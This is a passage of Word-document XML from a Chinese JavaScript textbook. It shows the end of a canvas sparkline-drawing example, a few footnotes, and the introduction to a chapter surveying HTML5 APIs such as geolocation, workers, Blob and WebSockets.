        <w:t>获取元素内容并转换成一个包含数字的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果转换失败，则跳过该元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>content=elt.textContent||elt.innerText;//</w:t>
      </w:r>
      <w:r>
        <w:t>元素内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var content=content.replace(/^\s+|\s+$/g,"");//</w:t>
      </w:r>
      <w:r>
        <w:t>去除空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=content.replace(/#.*$/gm,"");//</w:t>
      </w:r>
      <w:r>
        <w:t>去除注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text=text.replace(/[\n\r\t\v\f]/g,"");//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>等转换成空格</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=text.split(/\s+|\s*,\s*/);//</w:t>
      </w:r>
      <w:r>
        <w:t>以空格或者逗号进行分隔</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环每个数据块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data[i]=Number(data[i]);//</w:t>
      </w:r>
      <w:r>
        <w:t>转换成一个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isNaN(data[i]))continue main;//</w:t>
      </w:r>
      <w:r>
        <w:t>转换失败则中止</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在根据数据和元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data-</w:t>
      </w:r>
      <w:r>
        <w:t>属性以及元素的计算样式，来计算</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>迷你图的颜色、宽度、高度和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴的范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var style=getComputedStyle(elt,null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var color=style.color;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var height=parseInt(elt.getAttribute</w:t>
      </w:r>
      <w:r>
        <w:t>("data-height"))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt(style.fontSize)||20;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var width=parseInt(elt.getAttribute("data-width"))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>data.length*(parseInt(elt.getAttribute("data-dx"))||height/6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ymin=parseInt(elt.getAttribute("data-ymin"))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.min.apply(Math,data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ymax=pars</w:t>
      </w:r>
      <w:r>
        <w:t>eInt(elt.getAttribute("data-ymax"))||</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.max.apply(Math,data);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(ymin</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=ymax)ymax=ymin+1;//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个画布元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var canvas=document.createElement("canvas");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas.width=width;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置画布尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas.height=height;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>canvas.title=content;//</w:t>
      </w:r>
      <w:r>
        <w:t>将元素内容作为工具提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.innerHTML="";//</w:t>
      </w:r>
      <w:r>
        <w:t>将现有的元素内容抹除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.appendChild(canvas);//</w:t>
      </w:r>
      <w:r>
        <w:t>将该元素插入到画布中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>现在绘制点</w:t>
      </w:r>
      <w:r>
        <w:t>(i,data[i]),</w:t>
      </w:r>
      <w:r>
        <w:t>转换成画布坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var context=canvas.getContext('2d');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环每个数据点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=width*i/data.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>缩放</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>倍</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=(ymax-data[i])*height/(ymax-ymin);//</w:t>
      </w:r>
      <w:r>
        <w:t>缩放</w:t>
      </w:r>
      <w:r>
        <w:t>data[i]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.lineTo(x,y);//</w:t>
      </w:r>
      <w:r>
        <w:t>首先调用</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法而不是</w:t>
      </w:r>
      <w:r>
        <w:t>moveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.strokeStyle=color;//</w:t>
      </w:r>
      <w:r>
        <w:t>设置迷你图的颜色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>context.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>并将它绘制出来</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4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>浅绿色、黑色、蓝色、紫红色、灰色、绿色、石灰色、褐红色、藏青色、橄榄色、紫色、红色、银色、深青色、白色和黄色。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>夹角越小，斜接部分越长。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>在撰写本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器（版本</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>）把这弄错了并变换了阴影的偏移量。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="547" w:name="Di_22Zhang__HTML5_API"/>
      <w:bookmarkStart w:id="548" w:name="Di_22Zhang__HTML5_API____HTML5Bu_Jin_Jin"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>
      <w:bookmarkEnd w:id="548"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>不仅仅指的是最新版的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标准，它还指代目前一整套的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用技术，其中包括</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>相关技术。这里所谓的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用技术更正规的术语其实是开放的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>平台。然而，在实际开发过程中，</w:t>
      </w:r>
      <w:r>
        <w:t>"HTML5"</w:t>
      </w:r>
      <w:r>
        <w:t>更像一个方便的简写，本章就是以这种方式使用它的。一些新的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
      <w:r>
        <w:t>在本书的如下其他章节做了介绍：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>g etElementsByClassName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>querySelectorAll()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以及文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了元素的</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>lassList</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest Level 2</w:t>
      </w:r>
      <w:r>
        <w:t>、跨域</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>以及在服务端发送事件标准中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>EventSource API</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>和用于离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的应用缓存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍了＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素以及</w:t>
      </w:r>
      <w:r>
        <w:t>SVG</w:t>
      </w:r>
      <w:r>
        <w:t>图形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章将介绍其他的一些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
      <w:r>
        <w:t>，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·22.1</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍地理位置</w:t>
      </w:r>
      <w:r>
        <w:t>API,</w:t>
      </w:r>
      <w:r>
        <w:t>它能够允许浏览器（用户允许的情况）检测用户的物理位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍历史管理</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，它允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应</w:t>
      </w:r>
      <w:r>
        <w:t>用保存和更新它们的状态，以便当用户单击浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>前进</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮的时候，无须刷新立即做出响应。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍在非同源文档间传递消息的一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>提供了同源安全策略下（参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）解决跨域问题安全性的方案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>中一个主要的新特性：能在一个独立的后台线程中运行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，并且能够让这些</w:t>
      </w:r>
      <w:r>
        <w:t>worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>之间能够进行安全的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·22.5</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍一些与字节数组和数字数组相关的专用高效内存类型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·22.6</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>：不透明的数据块，作为中心数据交换格式，用于一些新的二进制数据</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。该节还将介绍一些与</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>相关的类型和</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象、</w:t>
      </w:r>
      <w:r>
        <w:t>BlobBuilder</w:t>
      </w:r>
      <w:r>
        <w:t>类型以及</w:t>
      </w:r>
      <w:r>
        <w:t>Blob URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·22.7</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，它允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用对一个私有沙箱文件系统中的文件进行读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写操作。该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>还不稳定，因此在第四部分中也没有对其做介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·22.8</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>，它用于在一个简单的数据库中存储和获取对象。和</w:t>
      </w:r>
      <w:r>
        <w:t>Filesytem API</w:t>
      </w:r>
      <w:r>
        <w:t>一样，该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>也还</w:t>
      </w:r>
      <w:r>
        <w:t>不稳定，因此在第四部分中也没有对其做介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>最后</w:t>
      </w:r>
      <w:r>
        <w:t>22.9</w:t>
      </w:r>
      <w:r>
        <w:t>节将介绍</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>套接字</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>：它允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用使用基于流的双向通信网络连接到服务器，而不是利用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>支持的无状态的请求</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>响应的网络模型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章要介绍的这些特性要么是不适合将它们放在前面章节中介绍，要么就是由于它们还不够稳定和成熟，无法将它们放在本书主要的章节中介绍。其中有些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>看似已经足够稳定可以在第四部分中介绍，然而它们在其他一些场景下，还是会出问题，因此没有在本书第四部分中介绍。此外，这里要说明的是，在本书出版之时，本章中除</w:t>
      </w:r>
      <w:r>
        <w:t>了例</w:t>
      </w:r>
      <w:r>
        <w:t>22-9</w:t>
      </w:r>
      <w:r>
        <w:t>外，其他的例子都至少可以在一个浏览器中运行。因为这里介绍到的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准一直都在不断完善中，也就是说，当你正在阅读本章的时候，其中有些例子可能都已经根本无法运行了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="549" w:name="22_1_Di_Li_Wei_Zhi_"/>
      <w:r>
        <w:t>22.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　地理位置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="549"/>
    </w:p>
